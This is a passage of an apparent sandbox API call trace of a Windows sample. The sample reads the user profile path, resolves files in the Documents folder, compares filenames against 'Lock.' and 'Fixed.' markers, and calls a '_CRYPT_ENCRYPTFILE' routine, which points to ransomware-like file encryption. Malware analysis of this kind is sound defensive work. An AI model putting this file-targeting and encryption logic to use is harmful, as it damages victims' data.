ftLastWriteTime.dwLowDateTime=0xb00c280, ftLastWriteTime.dwHighDateTime=0x1d566c4, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x0, dwReserved1=0x0, cFileName="S7DDzGLO.docx", cAlternateFileName="S7DDZG~1.DOC")) returned 0 [0267.564] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0267.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0267.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.564] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e558d8 [0267.565] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/S7DDzGLO.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\S7DDzGLO.docx", lpFilePart=0x8cf650*="S7DDzGLO.docx") returned 0x27 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0267.566] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\S7DDzGLO.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s7ddzglo.docx")) returned 0xffffffff [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.566] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.566] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.566] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vai5o9F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ai5o9F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i5o9F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5o9F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o9F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0267.567] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0267.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0267.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e79338 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vai5o9F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ai5o9F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i5o9F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5o9F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o9F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.568] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0267.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0267.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.569] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0267.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0267.569] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0267.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0267.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0267.570] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.571] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0267.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0267.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0267.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0267.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0267.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0267.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0267.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0267.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0267.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0267.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0267.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.591] RtlAllocateHeap 